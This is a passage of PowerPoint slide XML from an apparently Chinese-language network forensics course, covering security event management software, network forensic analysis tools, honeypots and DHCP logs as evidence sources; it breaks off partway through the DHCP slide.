            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0" smtClean="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6.3.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全事件管理（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="771550"/>
            <a:ext cx="7200800" cy="3831818"/>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en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Security Event Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件用来从多种不同的网络通信数据源（比如防火墙日志、入侵检测系统日志等）导入安全事件信息并关联这些数据源的事件，然后经由安全的通道提取这些不同数据源的日志副本，将其规范为标准格式，最后通过匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址、时间标记及其他特征来识别相关事件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不产生原始的事件数据，而是依靠导入的事件数据生成元事件数据。一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>产品不仅能识别恶意行为，例如攻击和病毒传染，还能发现对系统和网络的破坏和不合理的使用。由于通过一个界面就可以掌握很多网络通信数据源的信息，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在网络取证中特别有价值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>几乎能处理任何一个网络通信数据源的数据，例如操作系统日志、反病毒软件报警、物理安全设备日志等，它应该包含某个事件的各种不同信息。而实际上通常它只接受了部分数据，例如，一个入侵检测系统记录了一些数据包，但由于带宽和存储限制，这些数据包并没有传送给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。除此之外，由于网络通信数据源的数据格式千差万别，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要规范它们，转换每一个数据域成为标准格式，并且考虑其一致性，这样一来，就对数据分析十分有利。但规范的过程偶尔也会将错误引入数据或造成数据的丢失，幸好的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不会改变原始的数据，必要时，分析人员可以保留原始日志的副本，以便检验数据的正确性。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800" dirty="0" smtClean="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6.3.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证分析工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1002382"/>
            <a:ext cx="7200800" cy="3370153"/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络取证分析工具（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Network Forensic Analysis Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在单一产品中提供和数据包嗅探器、协议分析器和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件一样的功能。与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要关联存在于多个数据源的事件不同，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重点在于收集、检查和分析网络通信。此外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>还提供下述功能：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①通过重放网络通信数据重建事件。这些事件包括单独的会话（例如两个用户之间的即时消息，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Instant Message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），以及一个特定时间段内的所有会话，重放速度可以根据需要进行调整。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②可视化网络数据通信以及主机之间的联系。一些工具甚至可以把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址、域名或者其他数据绑定到物理地址，从而再现整个入侵活动的地图。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③建立典型入侵行为的模式及其可能的变化。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④按关键字搜索应用层的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="600" dirty="0" smtClean="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6.3.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其它来源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1563638"/>
            <a:ext cx="7200800" cy="1754326"/>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zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实际上还有其他一些网络流量的信息来源可以用来协助取证工作，包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蜜罐（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Honeypot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）和蜜网（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Honeynet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>作为一种动态的网络安全防范措施，蜜罐和蜜网提供了更好的识别和检测攻击的能力。由于蜜罐和蜜网的运行基于一种“诱骗（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Deception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）”的想法，并且对其的攻击行为一般不会对企业的服务产生真实的危害，所以蜜罐和蜜网的日志通常只用来协助取证。</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6.3.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其它来源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1725222"/>
            <a:ext cx="7200800" cy="1431161"/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器根据需要为网络上的主机分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。一些主机可能拥有静态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，即它们总是接受相同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址分配；更多的情况是主机接受动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址分配，这就意味着主机需要定期更换分配给它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，而不能保证总是一样。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器保留分配的日志，记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址、分配给某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
